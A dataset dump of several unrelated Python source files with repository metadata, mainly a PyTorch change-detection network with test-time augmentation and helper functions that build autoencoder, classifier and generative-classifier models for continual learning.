] | 47 | 2020-09-11T01:40:37.000Z | 2022-03-29T02:41:17.000Z | testsuite/data/scores/multisig_wallet/__init__.py | JINWOO-J/goloop | 7a3dc346493dda7dd913df49cd7feb4edd991995 | [
"Apache-2.0"
] | 41 | 2020-09-11T01:33:13.000Z | 2022-03-22T11:21:53.000Z | testsuite/data/scores/multisig_wallet/__init__.py | JINWOO-J/goloop | 7a3dc346493dda7dd913df49cd7feb4edd991995 | [
"Apache-2.0"
] | 24 | 2020-09-22T08:23:38.000Z | 2022-03-19T11:14:10.000Z | from .multisig_wallet import MultiSigWallet | 43 | 43 | 0.906977 | 5 | 43 | 7.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069767 | 43 | 1 | 43 | 43 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
77acb871c8f24af104734e6229991cfa71c7845b | 14,890 | py | Python | models/sseg/base.py | GIShkl/GAOFEN2021_CHANGEDETECTION | 5b7251cb1e951a04c7effacab6c1233232158472 | [
"MIT"
] | 3 | 2021-12-12T09:45:41.000Z | 2022-03-10T08:34:22.000Z | models/sseg/base.py | lyp19/GAOFEN2021_CHANGEDETECTION | 5b7251cb1e951a04c7effacab6c1233232158472 | [
"MIT"
] | null | null | null | models/sseg/base.py | lyp19/GAOFEN2021_CHANGEDETECTION | 5b7251cb1e951a04c7effacab6c1233232158472 | [
"MIT"
] | 1 | 2021-11-13T05:40:18.000Z | 2021-11-13T05:40:18.000Z | from models.backbone.hrnet import HRNet
from models.backbone.resnet import resnet18, resnet34, resnet50, resnet101, resnet152, resnext50_32x4d, resnext101_32x8d
import torch
from torch import nn
import torch.nn.functional as F
from models.pointrend import PointHead
from models.block.attention import PAM_Module, CAM_Module
from efficientnet_pytorch import EfficientNet
def get_backbone(backbone, pretrained):
    if backbone == "resnet18":
        backbone = resnet18(pretrained)
    elif backbone == "resnet34":
        backbone = resnet34(pretrained)
    elif backbone == "resnet50":
        backbone = resnet50(pretrained)
    elif backbone == "resnet101":
        backbone = resnet101(pretrained)
    elif backbone == "resnet152":
        backbone = resnet152(pretrained)
    elif backbone == "resnext50":
        backbone = resnext50_32x4d(pretrained)
    elif backbone == "resnext101":
        backbone = resnext101_32x8d(pretrained)
    elif "hrnet" in backbone:
        backbone = HRNet(backbone, pretrained)
    elif backbone == "efficientnet-b3":
        backbone = EfficientNet.from_pretrained('efficientnet-b3')
    else:
        exit("\nError: BACKBONE \'%s\' is not implemented!\n" % backbone)
    return backbone
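`get_backbone` above maps a backbone name string to a constructor through an if/elif chain; the same dispatch can be sketched with a registry dict, which keeps the lookup to one line per backbone. The constructor lambdas below are stand-ins, not the project's real backbone factories:

```python
# Hypothetical registry-based dispatch; the values are stand-in lambdas
# rather than the real resnet/HRNet/EfficientNet constructors.
BACKBONES = {
    "resnet18": lambda pretrained: ("resnet18", pretrained),
    "resnet50": lambda pretrained: ("resnet50", pretrained),
    "efficientnet-b3": lambda pretrained: ("efficientnet-b3", pretrained),
}

def build_backbone(name, pretrained=True):
    try:
        return BACKBONES[name](pretrained)
    except KeyError:
        raise ValueError("BACKBONE '%s' is not implemented!" % name)

print(build_backbone("resnet50", False))
```

Raising `ValueError` instead of calling `exit()` lets the caller decide how to handle an unknown backbone name.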
# class BaseNet(nn.Module):
# def __init__(self, backbone, pretrained):
# super(BaseNet, self).__init__()
# self.backbone = get_backbone(backbone, pretrained)
# def base_forward(self, x1, x2):
# b, c, h, w = x1.shape
# x1 = self.backbone.base_forward(x1)[-1]
# x2 = self.backbone.base_forward(x2)[-1]
# out1 = self.head(x1)
# out2 = self.head(x2)
# out1 = F.interpolate(out1, size=(
# h, w), mode='bilinear', align_corners=False)
# out2 = F.interpolate(out2, size=(
# h, w), mode='bilinear', align_corners=False)
# out_bin = torch.abs(x1 - x2)
# out_bin = self.head_bin(out_bin)
# out_bin = F.interpolate(out_bin, size=(
# h, w), mode='bilinear', align_corners=False)
# out_bin = torch.softmax(out_bin, dim=1)
# return out1, out2, out_bin.squeeze(1)
# def forward(self, x1, x2, tta=False):
# if not tta:
# return self.base_forward(x1, x2)
# else:
# out1, out2, out_bin = self.base_forward(x1, x2)
# out1 = F.softmax(out1, dim=1)
# out2 = F.softmax(out2, dim=1)
# out_bin = out_bin.unsqueeze(1)
# origin_x1 = x1.clone()
# origin_x2 = x2.clone()
# x1 = origin_x1.flip(2)
# x2 = origin_x2.flip(2)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(2)
# out2 += F.softmax(cur_out2, dim=1).flip(2)
# out_bin += cur_out_bin.unsqueeze(1).flip(2)
# x1 = origin_x1.flip(3)
# x2 = origin_x2.flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(3)
# out2 += F.softmax(cur_out2, dim=1).flip(3)
# out_bin += cur_out_bin.unsqueeze(1).flip(3)
# x1 = origin_x1.transpose(2, 3).flip(3)
# x2 = origin_x2.transpose(2, 3).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(3).transpose(2, 3)
# out2 += F.softmax(cur_out2, dim=1).flip(3).transpose(2, 3)
# out_bin += cur_out_bin.unsqueeze(1).flip(3).transpose(2, 3)
# x1 = origin_x1.flip(3).transpose(2, 3)
# x2 = origin_x2.flip(3).transpose(2, 3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).transpose(2, 3).flip(3)
# out2 += F.softmax(cur_out2, dim=1).transpose(2, 3).flip(3)
# out_bin += cur_out_bin.unsqueeze(1).transpose(2, 3).flip(3)
# x1 = origin_x1.flip(2).flip(3)
# x2 = origin_x2.flip(2).flip(3)
# cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
# out1 += F.softmax(cur_out1, dim=1).flip(3).flip(2)
# out2 += F.softmax(cur_out2, dim=1).flip(3).flip(2)
# out_bin += cur_out_bin.unsqueeze(1).flip(3).flip(2)
# out1 /= 6.0
# out2 /= 6.0
# out_bin /= 6.0
# return out1, out2, out_bin.squeeze(1)
# class BaseNet(nn.Module):
# def __init__(self, backbone, pretrained):
# super(BaseNet, self).__init__()
# self.backbone = get_backbone(backbone, pretrained)
# def base_forward(self, x1, x2):
# b, c, h, w = x1.shape
# # TODO change: feed the difference of the two inputs directly
# x_bin = x2-x1
# # extract features with the backbone
# x1 = self.backbone.base_forward(x1)[-1]
# x2 = self.backbone.base_forward(x2)[-1]
# # head outputs
# out1 = self.head(x1)
# out2 = self.head(x2)
# # upsample to the original image size
# out1 = F.interpolate(out1, size=(
# h, w), mode='bilinear', align_corners=False)
# out2 = F.interpolate(out2, size=(
# h, w), mode='bilinear', align_corners=False)
# # softmax outputs
# out1 = torch.softmax(out1, dim=1)
# out2 = torch.softmax(out2, dim=1)
# # output the change map and upsample
# out_bin = torch.abs(x1 - x2)
# out_bin = self.head_bin(out_bin)
# out_bin = F.interpolate(out_bin, size=(
# h, w), mode='bilinear', align_corners=False)
# # softmax output
# out_bin = torch.softmax(out_bin, dim=1)
# return out1, out2, out_bin
#     def forward(self, x1, x2, tta=False):
#         # Without test-time augmentation (TTA)
#         if not tta:
#             # Call the subclass's base_forward method
#             return self.base_forward(x1, x2)
#         # With TTA
#         else:
#             # Output on the original images
#             out1, out2, out_bin = self.base_forward(x1, x2)
#             # Keep the original images
#             origin_x1 = x1.clone()
#             origin_x2 = x2.clone()
#             # Output after flipping along dim=2
#             x1 = origin_x1.flip(2)
#             x2 = origin_x2.flip(2)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             # Accumulate the outputs
#             out1 += cur_out1.flip(2)
#             out2 += cur_out2.flip(2)
#             out_bin += cur_out_bin.flip(2)
#             # Output after flipping along dim=3
#             x1 = origin_x1.flip(3)
#             x2 = origin_x2.flip(3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.flip(3)
#             out2 += cur_out2.flip(3)
#             out_bin += cur_out_bin.flip(3)
#             # Transpose the axes, then flip
#             x1 = origin_x1.transpose(2, 3).flip(3)
#             x2 = origin_x2.transpose(2, 3).flip(3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.flip(3).transpose(2, 3)
#             out2 += cur_out2.flip(3).transpose(2, 3)
#             out_bin += cur_out_bin.flip(3).transpose(2, 3)
#             # Flip, then transpose the axes
#             x1 = origin_x1.flip(3).transpose(2, 3)
#             x2 = origin_x2.flip(3).transpose(2, 3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.transpose(2, 3).flip(3)
#             out2 += cur_out2.transpose(2, 3).flip(3)
#             out_bin += cur_out_bin.transpose(2, 3).flip(3)
#             # Flip both dim=2 and dim=3
#             x1 = origin_x1.flip(2).flip(3)
#             x2 = origin_x2.flip(2).flip(3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.flip(3).flip(2)
#             out2 += cur_out2.flip(3).flip(2)
#             out_bin += cur_out_bin.flip(3).flip(2)
#             # Average over the 6 TTA outputs
#             out1 /= 6.0
#             out2 /= 6.0
#             out_bin /= 6.0
#             return out1, out2, out_bin
# ***************************backbone==resnet****************************
class BaseNet(nn.Module):
    def __init__(self, backbone, pretrained):
        super(BaseNet, self).__init__()
        self.backbone = get_backbone(backbone, pretrained)

    def base_forward(self, x1, x2):
        b, c, h, w = x1.shape
        # Extract bi-temporal features with the backbone
        features1 = self.backbone.base_forward(x1)
        features2 = self.backbone.base_forward(x2)
        # Compute the change output and upsample to the input size
        out_bin = torch.abs(features2[-1] - features1[-1])
        out_bin = self.head(out_bin)
        out_bin = F.interpolate(out_bin, size=(h, w), mode='bilinear', align_corners=True)
        # out_bin = torch.softmax(out_bin, dim=1)
        return out_bin

    def forward(self, x1, x2, tta=False):
        # Without test-time augmentation (TTA)
        if not tta:
            # Call the subclass's base_forward method
            return self.base_forward(x1, x2)
        # With TTA: base_forward returns a single change map,
        # so only out_bin is accumulated here
        else:
            # Output on the original images
            out_bin = self.base_forward(x1, x2)
            # Keep the original images
            origin_x1 = x1.clone()
            origin_x2 = x2.clone()
            # Output after flipping along dim=2
            x1 = origin_x1.flip(2)
            x2 = origin_x2.flip(2)
            out_bin += self.base_forward(x1, x2).flip(2)
            # Output after flipping along dim=3
            x1 = origin_x1.flip(3)
            x2 = origin_x2.flip(3)
            out_bin += self.base_forward(x1, x2).flip(3)
            # Transpose the axes, then flip
            x1 = origin_x1.transpose(2, 3).flip(3)
            x2 = origin_x2.transpose(2, 3).flip(3)
            out_bin += self.base_forward(x1, x2).flip(3).transpose(2, 3)
            # Flip, then transpose the axes
            x1 = origin_x1.flip(3).transpose(2, 3)
            x2 = origin_x2.flip(3).transpose(2, 3)
            out_bin += self.base_forward(x1, x2).transpose(2, 3).flip(3)
            # Flip both dim=2 and dim=3
            x1 = origin_x1.flip(2).flip(3)
            x2 = origin_x2.flip(2).flip(3)
            out_bin += self.base_forward(x1, x2).flip(3).flip(2)
            # Average over the 6 TTA outputs
            out_bin /= 6.0
            return out_bin
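Each TTA transform above is undone on the network output by applying its inverse before accumulation. A pure-Python sketch of those inverse pairs, with toy 2-D lists standing in for dims 2 and 3 (the helper names are ours, not from this repo):

```python
# Pure-Python stand-ins for the tensor ops used in the TTA branch.
def flip_h(m):        # like tensor.flip(3): reverse each row
    return [row[::-1] for row in m]

def flip_v(m):        # like tensor.flip(2): reverse the row order
    return m[::-1]

def transpose(m):     # like tensor.transpose(2, 3)
    return [list(col) for col in zip(*m)]

x = [[1, 2, 3],
     [4, 5, 6]]

# A flip is its own inverse
assert flip_h(flip_h(x)) == x
assert flip_v(flip_v(x)) == x

# transpose-then-flip is undone by flip-then-transpose...
t = flip_h(transpose(x))
assert transpose(flip_h(t)) == x

# ...and flip-then-transpose is undone by transpose-then-flip
t = transpose(flip_h(x))
assert flip_h(transpose(t)) == x
```

This is exactly why, e.g., the input transformed with `.transpose(2, 3).flip(3)` has its output restored with `.flip(3).transpose(2, 3)` before being added into the running sum.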
# ***************************backbone==resnet***************************
# class BaseNet(nn.Module):
#     def __init__(self, backbone, pretrained):
#         super(BaseNet, self).__init__()
#         # self.sa = PAM_Module(1536).cuda()
#         # self.sc = CAM_Module(1536).cuda()
#         self.backbone = get_backbone(backbone, pretrained)
#         self.point_head = PointHead(in_c=1538)
#
#     def base_forward(self, x1, x2):
#         b, c, h, w = x1.shape
#         # Extract features with the backbone
#         features1 = self.backbone.base_forward(x1)
#         features2 = self.backbone.base_forward(x2)
#         # sa1 = self.sa(features1)
#         # sc1 = self.sc(features1)
#         # sa2 = self.sa(features2)
#         # sc2 = self.sc(features2)
#         # features1 = sa1 + sc1
#         # features2 = sa2 + sc2
#         # Head outputs
#         out1 = self.head(features1)
#         out2 = self.head(features2)
#         out_point1 = self.point_head(x1, features1, out1)
#         out_point2 = self.point_head(x2, features2, out2)
#         # Upsample to the original image size
#         out1 = F.interpolate(out1, size=(h, w), mode='bilinear', align_corners=False)
#         out2 = F.interpolate(out2, size=(h, w), mode='bilinear', align_corners=False)
#         # Softmax outputs
#         out1 = torch.softmax(out1, dim=1)
#         out2 = torch.softmax(out2, dim=1)
#         # Compute the change output and upsample
#         out_bin = torch.abs(features2 - features1)
#         out_bin = self.head_bin(out_bin)
#         out_bin = F.interpolate(out_bin, size=(h, w), mode='bilinear', align_corners=False)
#         out_bin = torch.softmax(out_bin, dim=1)
#         return out1, out2, out_bin
#
#     def forward(self, x1, x2, tta=False):
#         # Without test-time augmentation (TTA)
#         if not tta:
#             # Call the subclass's base_forward method
#             return self.base_forward(x1, x2)
#         # With TTA
#         else:
#             # Output on the original images
#             out1, out2, out_bin = self.base_forward(x1, x2)
#             # Keep the original images
#             origin_x1 = x1.clone()
#             origin_x2 = x2.clone()
#             # Output after flipping along dim=2
#             x1 = origin_x1.flip(2)
#             x2 = origin_x2.flip(2)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             # Accumulate the outputs
#             out1 += cur_out1.flip(2)
#             out2 += cur_out2.flip(2)
#             out_bin += cur_out_bin.flip(2)
#             # Output after flipping along dim=3
#             x1 = origin_x1.flip(3)
#             x2 = origin_x2.flip(3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.flip(3)
#             out2 += cur_out2.flip(3)
#             out_bin += cur_out_bin.flip(3)
#             # Transpose the axes, then flip
#             x1 = origin_x1.transpose(2, 3).flip(3)
#             x2 = origin_x2.transpose(2, 3).flip(3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.flip(3).transpose(2, 3)
#             out2 += cur_out2.flip(3).transpose(2, 3)
#             out_bin += cur_out_bin.flip(3).transpose(2, 3)
#             # Flip, then transpose the axes
#             x1 = origin_x1.flip(3).transpose(2, 3)
#             x2 = origin_x2.flip(3).transpose(2, 3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.transpose(2, 3).flip(3)
#             out2 += cur_out2.transpose(2, 3).flip(3)
#             out_bin += cur_out_bin.transpose(2, 3).flip(3)
#             # Flip both dim=2 and dim=3
#             x1 = origin_x1.flip(2).flip(3)
#             x2 = origin_x2.flip(2).flip(3)
#             cur_out1, cur_out2, cur_out_bin = self.base_forward(x1, x2)
#             out1 += cur_out1.flip(3).flip(2)
#             out2 += cur_out2.flip(3).flip(2)
#             out_bin += cur_out_bin.flip(3).flip(2)
#             # Average over the 6 TTA outputs
#             out1 /= 6.0
#             out2 /= 6.0
#             out_bin /= 6.0
#             return out1, out2, out_bin
| 35.793269 | 120 | 0.525252 | 1,919 | 14,890 | 3.875456 | 0.067223 | 0.085518 | 0.048407 | 0.064004 | 0.817937 | 0.814576 | 0.800592 | 0.782708 | 0.771144 | 0.75837 | 0 | 0.07555 | 0.334184 | 14,890 | 415 | 121 | 35.879518 | 0.674602 | 0.695635 | 0 | 0.144444 | 0 | 0 | 0.035495 | 0 | 0 | 0 | 0 | 0.00241 | 0 | 1 | 0.044444 | false | 0 | 0.088889 | 0 | 0.188889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
77daa37ae75aab16ca51397f20c8860614522dac | 124 | py | Python | game/game/event.py | maosplx/L2py | 5d81b2ea150c0096cfce184706fa226950f7f583 | [
"MIT"
] | 7 | 2020-09-01T21:52:37.000Z | 2022-02-25T16:00:08.000Z | game/game/event.py | maosplx/L2py | 5d81b2ea150c0096cfce184706fa226950f7f583 | [
"MIT"
] | 4 | 2021-09-10T22:15:09.000Z | 2022-03-25T22:17:43.000Z | game/game/event.py | maosplx/L2py | 5d81b2ea150c0096cfce184706fa226950f7f583 | [
"MIT"
] | 9 | 2020-09-01T21:53:39.000Z | 2022-03-30T12:03:04.000Z | from dataclasses import dataclass
from common import BaseDataclass
@dataclass
class ServerEvent(BaseDataclass):
    pass
| 13.777778 | 33 | 0.814516 | 13 | 124 | 7.769231 | 0.692308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153226 | 124 | 8 | 34 | 15.5 | 0.961905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
7acd80ea5ead306c357e27b55b3f9952aeca4869 | 27 | py | Python | radforest/geometry/__init__.py | argram30/RadForest | 585ba9dfd83dd2775ae4ef3c24c32be10d8aa88d | [
"MIT"
] | 4 | 2018-02-04T19:04:01.000Z | 2022-02-09T04:11:18.000Z | radforest/geometry/__init__.py | argram30/RadForest | 585ba9dfd83dd2775ae4ef3c24c32be10d8aa88d | [
"MIT"
] | 21 | 2017-08-15T21:13:42.000Z | 2021-12-23T20:07:24.000Z | radforest/geometry/__init__.py | argram30/RadForest | 585ba9dfd83dd2775ae4ef3c24c32be10d8aa88d | [
"MIT"
] | 1 | 2021-01-28T18:29:12.000Z | 2021-01-28T18:29:12.000Z | from .sphere import Sphere
| 13.5 | 26 | 0.814815 | 4 | 27 | 5.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7ad5d50db314c16ca28ca059efd0e369fa13b39b | 11,646 | py | Python | define_models.py | miladkhademinori/class-incremental-learning | 21dd41d31dea1dfafb1e8d90d7f0a1be6b1c6e66 | [
"MIT"
] | 33 | 2021-04-21T10:24:08.000Z | 2022-03-20T14:59:50.000Z | define_models.py | Bethhhh/class-incremental-learning | 21dd41d31dea1dfafb1e8d90d7f0a1be6b1c6e66 | [
"MIT"
] | null | null | null | define_models.py | Bethhhh/class-incremental-learning | 21dd41d31dea1dfafb1e8d90d7f0a1be6b1c6e66 | [
"MIT"
] | 8 | 2021-05-08T23:33:37.000Z | 2021-12-13T07:31:43.000Z | import utils
from utils import checkattr
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining auto-encoder model with built-in classifier
def define_vae_classifier(args, config, device, depth=0):
    # -import required model
    from models.vae_with_classifier import AutoEncoder
    # -create model
    if depth > 0:
        model = AutoEncoder(
            image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
            # -conv-layers
            conv_type=args.conv_type, depth=depth, start_channels=args.channels, reducing_layers=args.rl,
            num_blocks=args.n_blocks, conv_bn=True if args.conv_bn == "yes" else False, conv_nl=args.conv_nl,
            global_pooling=checkattr(args, 'gp'),
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
            fc_drop=args.fc_drop, fc_bn=True if args.fc_bn == "yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
            # -prior
            prior=args.prior if hasattr(args, "prior") else "standard",
            n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
            per_class=args.per_class if hasattr(args, "prior") else False,
            # -decoder
            recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment == "MNIST" else "none",
            deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
            dg_gates=utils.checkattr(args, 'dg_gates'), device=device,
            dg_prop=args.dg_prop if hasattr(args, 'dg_prop') else 0.,
            # -classifier
            classifier=True, classify_opt=args.classify if hasattr(args, "classify") else "beforeZ", lamda_pl=1.
        ).to(device)
    else:
        model = AutoEncoder(
            image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
            fc_drop=args.fc_drop, fc_bn=True if args.fc_bn == "yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
            # -prior
            prior=args.prior if hasattr(args, "prior") else "standard",
            n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
            per_class=args.per_class if hasattr(args, "prior") else False,
            # -decoder
            recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment == "MNIST" else "none",
            deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
            dg_gates=utils.checkattr(args, 'dg_gates'), device=device,
            dg_prop=args.dg_prop if hasattr(args, 'dg_prop') else 0.,
            # -classifier
            classifier=True, classify_opt=args.classify if hasattr(args, "classify") else "beforeZ", lamda_pl=1.,
        ).to(device)
    # -return model
    return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining auto-encoder model
def define_autoencoder(args, config, device, depth=0):
    # -import required model
    from models.vae import AutoEncoder
    # -create model
    if depth > 0:
        model = AutoEncoder(
            image_size=config['size'], image_channels=config['channels'],
            # -conv-layers
            conv_type=args.conv_type, depth=depth, start_channels=args.channels, reducing_layers=args.rl,
            num_blocks=args.n_blocks, conv_bn=True if args.conv_bn=="yes" else False, conv_nl=args.conv_nl,
            global_pooling=False, no_fnl=True if args.conv_type=="standard" else False,
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
            fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
            # -prior
            prior=args.prior if hasattr(args, "prior") else "standard",
            n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
            # -decoder
            recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=="MNIST" else "none",
            deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
        ).to(device)
    else:
        model = AutoEncoder(
            image_size=config['size'], image_channels=config['channels'],
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
            fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
            # -prior
            prior=args.prior if hasattr(args, "prior") else "standard",
            n_modes=args.n_modes if hasattr(args, "n_modes") else 1, z_dim=args.z_dim,
            # -decoder
            recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=="MNIST" else "none",
            deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
        ).to(device)
    # -return model
    return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining feature extractor model
def define_feature_extractor(args, config, device):
    # -import required model
    from models.feature_extractor import FeatureExtractor
    # -create model
    model = FeatureExtractor(
        image_size=config['size'], image_channels=config['channels'],
        # -conv-layers
        conv_type=args.conv_type, depth=args.depth, start_channels=args.channels, reducing_layers=args.rl,
        num_blocks=args.n_blocks, conv_bn=True if args.conv_bn=="yes" else False, conv_nl=args.conv_nl,
        global_pooling=checkattr(args, 'gp'),
    ).to(device)
    # -return model
    return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining SLDA model
def define_slda(args, num_features, classes, device='cpu'):
    from models.slda import StreamingLDA
    # -create model
    classifier = StreamingLDA(
        num_features=num_features, classes=classes,
        # -slda parameters
        epsilon=1e-4, device=device, covariance=args.covariance if hasattr(args, 'covariance') else "identity",
    ).to(device)
    return classifier
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining classifier model
def define_classifier(args, config, device, no_fnl_fc=False, depth=0):
    # -import required model
    from models.classifier import Classifier
    # -create model
    if depth > 0:
        model = Classifier(
            image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
            # -conv-layers
            conv_type=args.conv_type, depth=depth, start_channels=args.channels, reducing_layers=args.rl,
            num_blocks=args.n_blocks, conv_bn=True if args.conv_bn=="yes" else False, conv_nl=args.conv_nl,
            global_pooling=checkattr(args, 'gp'), no_fnl=True if args.conv_type=="standard" else False,
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim, no_fnl_fc=no_fnl_fc,
            fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
            # -training related parameters
            neg_samples=args.neg_samples if hasattr(args, "neg_samples") else "all",
            classes_per_task=config['classes_per_task'] if hasattr(args, "tasks") else None
        ).to(device)
    else:
        model = Classifier(
            image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim, no_fnl_fc=no_fnl_fc,
            fc_drop=args.fc_drop, fc_bn=True if args.fc_bn=="yes" else False, fc_nl=args.fc_nl, excit_buffer=True,
            # -training related parameters
            neg_samples=args.neg_samples if hasattr(args, "neg_samples") else "all",
            classes_per_task=config['classes_per_task'] if hasattr(args, "tasks") else None
        ).to(device)
    # -return model
    return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for defining generative classifier model
def define_gen_classifer(args, config, device, convE=None, depth=0):
    # -import required model
    from models.gen_classsifier import GenClassifier
    # -create model
    if depth > 0:
        model = GenClassifier(
            image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
            # -conv-layers
            conv_type=args.conv_type, depth=depth,
            start_channels=args.channels, reducing_layers=args.rl, conv_bn=(args.conv_bn=="yes"), conv_nl=args.conv_nl,
            num_blocks=args.n_blocks, convE=convE, global_pooling=checkattr(args, 'gp'),
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
            fc_drop=args.fc_drop, fc_bn=(args.fc_bn=="yes"), fc_nl=args.fc_nl, excit_buffer=True,
            # -prior
            prior=args.prior, n_modes=args.n_modes, z_dim=args.z_dim,
            # -decoder
            recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=='MNIST' else "none",
            deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
        ).to(device)
    else:
        model = GenClassifier(
            image_size=config['size'], image_channels=config['channels'], classes=config['classes'],
            # -fc-layers
            fc_layers=args.fc_lay, fc_units=args.fc_units, h_dim=args.h_dim,
            fc_drop=args.fc_drop, fc_bn=(args.fc_bn=="yes"), fc_nl=args.fc_nl, excit_buffer=True,
            # -prior
            prior=args.prior, n_modes=args.n_modes, z_dim=args.z_dim,
            # -decoder
            recon_loss=args.recon_loss, network_output="sigmoid" if args.experiment=='MNIST' else "none",
            deconv_type=args.deconv_type if hasattr(args, "deconv_type") else "standard",
        ).to(device)
    # -return model
    return model
##-------------------------------------------------------------------------------------------------------------------##
## Function for (re-)initializing the parameters of [model]
def init_params(model, args):
    # - reinitialize all parameters according to default initialization
    model.apply(utils.weight_reset)
    # - initialize parameters according to chosen custom initialization (if requested)
    if hasattr(args, 'init_weight') and not args.init_weight=="standard":
        utils.weight_init(model, strategy="xavier_normal")
    if hasattr(args, 'init_bias') and not args.init_bias=="standard":
        utils.bias_init(model, strategy="constant", value=0.01)
    # - use pre-trained weights in conv-layers?
    if utils.checkattr(args, "pre_convE") and hasattr(model, 'depth') and model.depth>0:
        load_name = model.convE.name if (
            not hasattr(args, 'convE_ltag') or args.convE_ltag=="none"
        ) else "{}-{}".format(model.convE.name, args.convE_ltag)
        utils.load_checkpoint(model.convE, model_dir=args.m_dir, name=load_name)
    return model
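For reference, the `xavier_normal` strategy requested above draws each weight from a zero-mean normal whose standard deviation follows the Glorot formula. A minimal sketch of that formula (the helper name is ours, not part of this repo's `utils`):

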